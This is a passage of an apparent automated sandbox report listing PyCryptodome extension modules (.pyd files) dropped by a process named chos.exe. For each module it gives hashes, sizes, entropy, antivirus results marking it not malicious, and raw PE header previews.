SSDEEP:	192:saF/1n7Guqaj0ktrE8o2o+V2rQnjt1wmg9jtveDn4clG6VcqgOvgdd:swGXkFE8Zo+AojO9jZeDf5rgOvgz
MD5:	309D6F6B0DD022EBD9214F445CAC7BB9
SHA1:	ABD22690B7AD77782CFC0D2393D0C038E16070B0
SHA-256:	4FBE188C20FB578D4B66349D50AA6FFE4AB86844FB6427C57738F36780D1E2E2
SHA-512:	D1951FE92F83E7774E8E877815BED6E6216D56EF18B7F1C369D678CB6E1814243659E9FA7ABC0D22FB5B34A9D50A51D5A89BA00AE1FDD32157FD0FF9902FB4B7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...U..f.........." ................P.....................................................`..........................................8.......9..d....`.......P..@............p..(....2...............................2..8............0...............................text...x........................... ..`.rdata.......0....... ..............@..@.data...H....@......................@....pdata..@....P.......0..............@..@.rsrc........`.......4..............@..@.reloc..(....p.......6..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_BLAKE2s.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13824
Entropy (8bit):	5.176369829782773
Encrypted:	false
SSDEEP:	192:rF/1n7Guqaj0ktrESsrUW+SBjsK5tcQmEreD2mf1AoxkVcqgOvgXQ:rGXkFE/UW575tA2eDp1Ao2rgOvgX
MD5:	D54FEB9A270B212B0CCB1937C660678A
SHA1:	224259E5B684C7AC8D79464E51503D302390C5C9
SHA-256:	032B83F1003A796465255D9B246050A196488BAC1260F628913E536314AFDED4
SHA-512:	29955A6569CA6D039B35BB40C56AEEB75FC765600525D0B469F72C97945970A428951BAB4AF9CD21B3161D5BBA932F853778E2674CA83B14F7ABA009FA53566F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...U..f.........." ................P.....................................................`..........................................8.......9..d....`.......P..@............p..(....2...............................2..8............0...............................text...h........................... ..`.rdata.......0......................@..@.data...H....@.......,..............@....pdata..@....P......................@..@.rsrc........`.......2..............@..@.reloc..(....p.......4..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_MD2.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14336
Entropy (8bit):	5.047563322651927
Encrypted:	false
SSDEEP:	384:6alCvH32p3/2pnEhKnLg9yH8puzoFaPERIQAvHD9CIg5kP:5CvHmp3OpnEhmLg9yH8puzoFaPERIQgI
MD5:	52DCD4151A9177CF685BE4DF48EA9606
SHA1:	F444A4A5CBAE9422B408420115F0D3FF973C9705
SHA-256:	D54375DC0652358A6E4E744F1A0EAEEAD87ACCD391A20D6FF324FE14E988A122
SHA-512:	64C54B89F2637759309ECC6655831C3A6755924ED70CBC51614061542EB9BA9A8AECF6951EB3AB92447247DC4D7D846C88F4957DBBE4484A9AB934343EE27178
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...Q..f.........." ......... ......P.....................................................`.........................................@9.......9..d....`.......P..(............p..(....2...............................2..8............0...............................text...X........................... ..`.rdata..@....0......................@..@.data...x....@......................@....pdata..(....P.......0..............@..@.rsrc........`.......4..............@..@.reloc..(....p.......6..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_MD4.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13824
Entropy (8bit):	5.09893680790018
Encrypted:	false
SSDEEP:	192:xsiXeqVb0lwbH4P01sAD7I/9hAkwDWzBEbcqgqLg:valqH4M1sAD7KvpwDFtgqLg
MD5:	F929B1A3997427191E07CF52AC883054
SHA1:	C5EA5B68586C2FB09E5FDD20D4DD616D06F5CBA6
SHA-256:	5386908173074FABD95BF269A9DF0A4E1B21C0576923186F449ABF4A820F6A8E
SHA-512:	2C79DBCE2C21214D979AB86DD989D41A3AFA7FCB7F3B79BA9974E2EE8F832DD7CA20C1C87C0C380DB037D776FE6D0851D60AD55A08AFDE0003B7E59214DD2F3B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...R..f.........." ................P.....................................................`.........................................08.......8..d....`.......P..(............p..(....1...............................2..8............0...............................text............................... ..`.rdata..0....0......................@..@.data........@.......,..............@....pdata..(....P......................@..@.rsrc........`.......2..............@..@.reloc..(....p.......4..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_MD5.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	15360
Entropy (8bit):	5.451865349855574
Encrypted:	false
SSDEEP:	384:KfwogDHER1wuiDSyoGTgDZOviNgEPrLg:ugDHELwuiDScTgDwi+EP
MD5:	1FA5E257A85D16E916E9C22984412871
SHA1:	1AC8EE98AD0A715A1B40AD25D2E8007CDC19871F
SHA-256:	D87A9B7CAD4C451D916B399B19298DC46AAACC085833C0793092641C00334B8E
SHA-512:	E4205355B647C6E28B7E4722328F51DC2EB3A109E9D9B90F7C53D7A80A5A4B10E40ABDDAB1BA151E73EF3EB56941F843535663F42DCE264830E6E17BB659EADF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...R..f.........." ..... ..........P.....................................................`..........................................8......`9..d....`.......P..X............p..(....1...............................1..8............0...............................text............ .................. ..`.rdata.......0.......$..............@..@.data........@.......2..............@....pdata..X....P.......4..............@..@.rsrc........`.......8..............@..@.reloc..(....p.......:..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_RIPEMD160.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13824
Entropy (8bit):	5.104245335186531
Encrypted:	false
SSDEEP:	192:3F/1n7Guqaj0kt7/Ev9kt0Qwac6QzD8iD0QocqgI4G0S:nGXkd/EvGt9wacNDvAgI4v
MD5:	FAD578A026F280C1AE6F787B1FA30129
SHA1:	9A3E93818A104314E172A304C3D117B6A66BEB55
SHA-256:	74A1FF0801F4704158684267CD8E123F83FB6334FE522C1890AC4A0926F80AB1
SHA-512:	ACF8F5B382F3B4C07386505BBDCAF625D13BCC10AA93ED641833E3548261B0AD1063E2F59BE2FCD2AFAF3D315CB3FC5EB629CEFC168B33CFD65A3A6F1120F7FF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...U..f.........." ......... ......P.....................................................`..........................................9.......:..d....`.......P...............p..(...@3..............................`3..8............0...............................text...H........................... ..`.rdata.......0......................@..@.data...H....@.......,..............@....pdata.......P......................@..@.rsrc........`.......2..............@..@.reloc..(....p.......4..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_SHA1.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	17920
Entropy (8bit):	5.671305741258107
Encrypted:	false
SSDEEP:	384:APHoDUntQj0sKhDOJ+0QPSfu6rofDjiZzgE+kbwb:VUOYsKNO466DjoUE+
MD5:	556E6D0E5F8E4DA74C2780481105D543
SHA1:	7A49CDEF738E9FE9CD6CD62B0F74EAD1A1774A33
SHA-256:	247B0885CF83375211861F37B6DD1376AED5131D621EE0137A60FE7910E40F8B
SHA-512:	28FA0CE6BDBCC5E95B80AADC284C12658EF0C2BE63421AF5627776A55050EE0EA0345E30A15B744FC2B2F5B1B1BBB61E4881F27F6E3E863EBAAEED1073F4CDA1
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h..9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...R..f.........." ...............P.....................................................`..........................................H......hI..d....p.......`..X...............(....A...............................A..8............@...............................text....).......*.................. ..`.rdata.......@......................@..@.data........P.......<..............@....pdata..X....`.......>..............@..@.rsrc........p.......B..............@..@.reloc..(............D..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_SHA224.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	21504
Entropy (8bit):	5.878701941774916
Encrypted:	false
SSDEEP:	384:EJWo4IRCGHX1KXqHGcvYHp5RYcARQOj4MSTjqgPmJD1OhgkxEv:EcIRnHX1P/YtswvaD1Rk
MD5:	2F2655A7BBFE08D43013EDDA27E77904
SHA1:	33D51B6C423E094BE3E34E5621E175329A0C0914
SHA-256:	C734ABBD95EC120CB315C43021C0E1EB1BF2295AF9F1C24587334C3FCE4A5BE1
SHA-512:	8AF99ACC969B0E560022F75A0CDCAA85D0BDEADADEACD59DD0C4500F94A5843EA0D4107789C1A613181B1F4E5252134A485EF6B1D9D83CDB5676C5FEE4D49B90
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...S..f.........." .....6... ......P.....................................................`.........................................@Z......([..d............p..................(....R...............................R..8............P...............................text....5.......6.................. ..`.rdata..x....P.......:..............@..@.data........`.......J..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc..(............R..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_SHA256.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	21504
Entropy (8bit):	5.881781476285865
Encrypted:	false
SSDEEP:	384:EJWo4IRCGHXfKXqHGcvYHp5RYcARQOj4MSTjqgPmJD12gkxEv:EcIRnHXfP/YtswvaD1zk
MD5:	CDE035B8AB3D046B1CE37EEE7EE91FA0
SHA1:	4298B62ED67C8D4F731D1B33E68D7DC9A58487FF
SHA-256:	16BEA322D994A553B293A724B57293D57DA62BC7EAF41F287956B306C13FD972
SHA-512:	C44FDEE5A210459CE4557351E56B2D357FD4937F8EC8EACEAB842FEE29761F66C2262FCBAAC837F39C859C67FA0E23D13E0F60B3AE59BE29EB9D8ABAB0A572BB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...S..f.........." .....6... ......P.....................................................`.........................................@Z......([..d............p..................(....R...............................R..8............P...............................text....5.......6.................. ..`.rdata..x....P.......:..............@..@.data........`.......J..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc..(............R..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_SHA384.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26624
Entropy (8bit):	5.837887867708438
Encrypted:	false
SSDEEP:	768:e839Cc4itui0gel9soFdkO66MlPGXmXcyYDTzks:Ns4u/FZ6nPxMLDvk
MD5:	999D431197D7E06A30E0810F1F910B9A
SHA1:	9BFF781221BCFFD8E55485A08627EC2A37363C96
SHA-256:	AB242B9C9FB662C6F7CB57F7648F33983D6FA3BB0683C5D4329EC2CC51E8C875
SHA-512:	A5DD92DD471ADB44EEFE5919EF9CA3978724E21174DF5B3A9C1F0AB462F928E5A46A460D02417DB7522F5DE3BFEED5EEE6B1EAFAF3E621722E85E72675F7096F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...T..f.........." .....H..."......P.....................................................`..........................................k.......l..d...............................(...pd...............................d..8............`...............................text....F.......H.................. ..`.rdata.......`.......L..............@..@.data................^..............@....pdata...............`..............@..@.rsrc................d..............@..@.reloc..(............f..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_SHA512.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26624
Entropy (8bit):	5.895310340516013
Encrypted:	false
SSDEEP:	768:lcX9Nf4ttui0gel9soFdkO66MlPGXmXc/vDTOvk:a38u/FZ6nPxM3DAk
MD5:	0931ABBF3AED459B1A2138B551B1D3BB
SHA1:	9EC0296DDAF574A89766A2EC035FC30073863AB0
SHA-256:	1729A0DC6B80CB7A3C07372B98B10D3C6C613EA645240878E1FDE6A992FA06F1
SHA-512:	9F970BB4D10B94F525DDDDE307C7DA5E672BBFB3A3866A34B89B56ADA99476724FD690A4396857182749294F67F36DB471A048789FB715D2A7DAF46917FC1947
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...T..f.........." .....H..."......P.....................................................`.........................................@l......(m..d...............................(....d...............................e..8............`...............................text...hG.......H.................. ..`.rdata..x....`.......L..............@..@.data................^..............@....pdata...............`..............@..@.rsrc................d..............@..@.reloc..(............f..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_ghash_clmul.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12800
Entropy (8bit):	4.967737129255606
Encrypted:	false
SSDEEP:	192:dMpWt/1nCuqaL0kt7TsEx2fiTgDZqGF0T7cqgkLgJ:k/k1Ts64DDJyBgkLg
MD5:	5F057A380BACBA4EF59C0611549C0E02
SHA1:	4B758D18372D71F0AA38075F073722A55B897F71
SHA-256:	BCB14DAC6C87C24269D3E60C46B49EFFB1360F714C353318F5BBAA48C79EC290
SHA-512:	E1C99E224745B86EE55822C1DBCB4555A11EC31B72D87B46514917EB61E0258A1C6D38C4F592969C17EB4F0F74DA04BCECA31CF1622720E95F0F20E9631792E8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^J.6?$.6?$.6?$.?G..2?$.dJ%.4?$.}G%.5?$.6?%..?$.dJ!.<?$.dJ .>?$.dJ'.5?$..J,.7?$..J$.7?$..J..7?$..J&.7?$.Rich6?$.........................PE..d...V..f.........." ................P.....................................................`.........................................P8.......8..d....`.......P...............p..(....1...............................1..8............0...............................text............................... ..`.rdata..2....0......................@..@.data...H....@.......(..............@....pdata.......P.......*..............@..@.rsrc........`......................@..@.reloc..(....p.......0..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_ghash_portable.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13312
Entropy (8bit):	5.007867576025166
Encrypted:	false
SSDEEP:	192:bMt/1nCuqaL0ktPH0T7fwtF4zDn2rGacqgRGd:1/kpU3Yv4zDXqgRGd
MD5:	49BCA1B7DF076D1A550EE1B7ED3BD997
SHA1:	47609C7102F5B1BCA16C6BAD4AE22CE0B8AEE9E9
SHA-256:	49E15461DCB76690139E71E9359F7FCF92269DCCA78E3BFE9ACB90C6271080B2
SHA-512:	8574D7FA133B72A4A8D1D7D9FDB61053BC88C2D238B7AC7D519BE19972B658C44EA1DE433885E3206927C75DD5D1028F74999E048AB73189585B87630F865466
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.j.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...V..f.........." ................P.....................................................`..........................................8.......8..d....`.......P..X............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......*..............@....pdata..X....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..(....p.......2..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_keccak.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	15872
Entropy (8bit):	5.226023387740053
Encrypted:	false
SSDEEP:	384:rfRKTN+HLjRskTdf4WazSTkwjEvuY2bylHDiYIgovg:mcHfRl5pauoSjy5DiE
MD5:	CB5CFDD4241060E99118DEEC6C931CCC
SHA1:	1E7FED96CF26C9F4730A4621CA9D18CECE3E0BCE
SHA-256:	A8F809B6A417AF99B75EEEEA3ECD16BDA153CBDA4FFAB6E35CE1E8C884D899C4
SHA-512:	8A89E3563C14B81353D251F9F019D8CBF07CB98F78452B8522413C7478A0D77B9ABF2134E4438145D6363CDA39721D2BAE8AD13D1CDACCBB5026619D95F931CF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...U..f.........." ..... ... ......P.....................................................`..........................................9.......9..d....`.......P..X............p..(...p2...............................2..8............0...............................text............ .................. ..`.rdata..@....0.......$..............@..@.data........@.......4..............@....pdata..X....P.......6..............@..@.rsrc........`.......:..............@..@.reloc..(....p.......<..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_poly1305.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14848
Entropy (8bit):	5.262055670423592
Encrypted:	false
SSDEEP:	192:C/ZN2eq/b04PAHH41F6fnVS0sVn+5CA5Z1cD66WGcqgFjLg:vI4IHHaQfSVnCZyDImgFjLg
MD5:	18D2D96980802189B23893820714DA90
SHA1:	5DEE494D25EB79038CBC2803163E2EF69E68274C
SHA-256:	C2FD98C677436260ACB9147766258CB99780A007114AED37C87893DF1CF1A717
SHA-512:	0317B65D8F292332C5457A6B15A77548BE5B2705F34BB8F4415046E3E778580ABD17B233E6CC2755C991247E0E65B27B5634465646715657B246483817CACEB7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...V..f.........." ................P.....................................................`..........................................8.......9..d....`.......P..\|............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......."..............@..@.data........@.......0..............@....pdata..\|....P.......2..............@..@.rsrc........`.......6..............@..@.reloc..(....p.......8..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Math\_modexp.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	5.913843738203007
Encrypted:	false
SSDEEP:	384:dspbXtHQY4ubrttQza9CHnZXQsnecAlOF0qZLAXxQI3Sya6XPpMg3Yx8MnDcCPSq:7Y44UagH6cAFCLUSYpMg3YDzPo5kG9G
MD5:	EF472BA63FD22922CA704B1E7B95A29E
SHA1:	700B68E7EF95514D5E94D3C6B10884E1E187ACD8
SHA-256:	66EEF4E6E0CEEEF2C23A758BFBEDAE7C16282FC93D0A56ACAFC40E871AC3F01C
SHA-512:	DC2060531C4153C43ABF30843BCB5F8FA082345CA1BB57F9AC8695EDDB28FF9FDA8132B6B6C67260F779D95FCADCAE2811091BCA300AB1E041FAE6CC7B50ABD8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..P~...~...~...w.3.x...,...\|...5...}...~...U...,...u...,...v...,...}.......\|............._.............Rich~...................PE..d...^..f.........." .....`...0......`.....................................................`..........................................~..\|...L...d...............<...............(....q...............................q..8............p..(............................text...X^.......`.................. ..`.rdata.......p.......d..............@..@.data................x..............@....pdata..<...........................@..@.rsrc...............................@..@.reloc..(...........................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Protocol\_scrypt.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.735350805948923
Encrypted:	false
SSDEEP:	192:rhsC3eqv6b0q3OQ3rHu5bc64OhD2I/p3cqgONLg:r/Hq3jHuY64OhDJJgONLg
MD5:	3B1CE70B0193B02C437678F13A335932
SHA1:	063BFD5A32441ED883409AAD17285CE405977D1F
SHA-256:	EB2950B6A2185E87C5318B55132DFE5774A5A579259AB50A7935A7FB143EA7B1
SHA-512:	0E02187F17DFCFD323F2F0E62FBFE35F326DCF9F119FC8B15066AFAEEE4EB7078184BC85D571B555E9E67A2DD909EC12D8A67E3D075E9B1283813EF274E05C0D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^:.6?T.6?T.6?T.?G..2?T.dJU.4?T.}GU.5?T.6?U..?T.dJQ.<?T.dJP.>?T.dJW.5?T..J\.7?T..JT.7?T..J..7?T..JV.7?T.Rich6?T.........................PE..d...Z..f.........." ................P.....................................................`..........................................8..d....8..d....`.......P..4............p..(....1...............................1..8............0...............................text...H........................... ..`.rdata..0....0......................@..@.data........@.......&..............@....pdata..4....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..(....p......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\PublicKey\_curve25519.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22528
Entropy (8bit):	5.705606408072877
Encrypted:	false
SSDEEP:	384:19BcRxBmau38CYIl9bhgIW0mvufueNr359/tjGGDEFSegqrA:NcRy38J+9dmvufFtaGDV
MD5:	FF33C306434DEC51D39C7BF1663E25DA
SHA1:	665FCF47501F1481534597C1EAC2A52886EF0526
SHA-256:	D0E3B6A2D0E073B2D9F0FCDB051727007943A17A4CA966D75EBA37BECDBA6152
SHA-512:	66A909DC9C3B7BD4050AA507CD89B0B3A661C85D33C881522EC9568744953B698722C1CBFF093F9CBCD6119BD527FECAB05A67F2E32EC479BE47AFFA4377362C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...\..f.........." .....6...$......P.....................................................`.........................................`Y......`Z..d............p..................(....R..............................0R..8............P...............................text...(5.......6.................. ..`.rdata.......P.......:..............@..@.data........`.......J..............@....pdata.......p.......P..............@..@.rsrc................T..............@..@.reloc..(............V..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\PublicKey\_curve448.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	70656
Entropy (8bit):	6.0189903352673655
Encrypted:	false
SSDEEP:	1536:Jfju4GgRMgWWnEDZiECgd/iwOXUQdbhov0Clb8Cx4hpK8ithLFIDullRPwDHxXOa:pXRMgWiEDZiECgd/iwOXUQdbhov0ClbU
MD5:	F267BF4256F4105DAD0D3E59023011ED
SHA1:	9BC6CA0F375CE49D5787C909D290C07302F58DA6
SHA-256:	1DDE8BE64164FF96B2BAB88291042EB39197D118422BEE56EB2846E7A2D2F010
SHA-512:	A335AF4DBF1658556ED5DC13EE741419446F7DAEC6BD2688B626A803FA5DD76463D6367C224E0B79B17193735E2C74BA417C26822DAEEF05AC3BAB1588E2DE83
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..P~...~...~...w.3.x...,...\|...5...}...~...U...,...u...,...v...,...}.......\|............._.............Rich~...................PE..d...\..f.........." .........8......`........................................P............`.............................................0.......d....0....... ..$............@..(.......................................8............................................text...8........................... ..`.rdata..............................@..@.data...............................@....pdata..$.... ......................@..@.rsrc........0......................@..@.reloc..(....@......................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\PublicKey\_ec_ws.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	770560
Entropy (8bit):	7.613224993327352
Encrypted:	false
SSDEEP:	12288:XtIrHoxJ8gf1266y8IXhJvCKAmqVLzcrZgYIMGv1iLD9yQvG6h:XtIrHoxJFf1p34hcrn5Go9yQO6
MD5:	1EFD7F7CB1C277416011DE6F09C355AF
SHA1:	C0F97652AC2703C325AB9F20826A6F84C63532F2
SHA-256:	AB45FA80A68DB1635D41DC1A4AAD980E6716DAC8C1778CB5F30CDB013B7DF6E6
SHA-512:	2EC4B88A1957733043BBD63CEAA6F5643D446DB607B3267FAD1EC611E6B0AF697056598AAC2AE5D44AB2B9396811D183C32BCE5A0FF34E583193A417D1C5226B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........s.. .. .. ... .. ..!.. ..!.. .. .. ..!.. ..!.. ..!.. \..!.. \..!.. \.r .. \..!.. Rich.. ................PE..d...[..f.........." ................`.....................................................`.............................................h.......d...............................0......................................8...............(............................text............................... ..`.rdata..............................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..0...........................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\PublicKey\_ed25519.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26112
Entropy (8bit):	5.8551858881598795
Encrypted:	false
SSDEEP:	384:BczadRwoF2MZ81n0XTyMCYIl9bhgIW0mv8aeadRcwRwftjGLD2pRQNgQQ77k:2udRf2MuMJ+9dmv8aea34taLDcfQ
MD5:	C5FB377F736ED731B5578F57BB765F7A
SHA1:	5BA51E11F4DE1CAEDEBA0F7D4D10EC62EC109E01
SHA-256:	32073DF3D5C85ABCE7D370D6E341EF163A8350F6A9EDC775C39A23856CCFDD53
SHA-512:	D361BCDAF2C700D5A4AC956D96E00961432C05A1B692FC870DB53A90F233A6D24AA0C3BE99E40BD8E5B7C6C1B2BCDCDCFC545292EF321486FFC71C5EA7203E6A
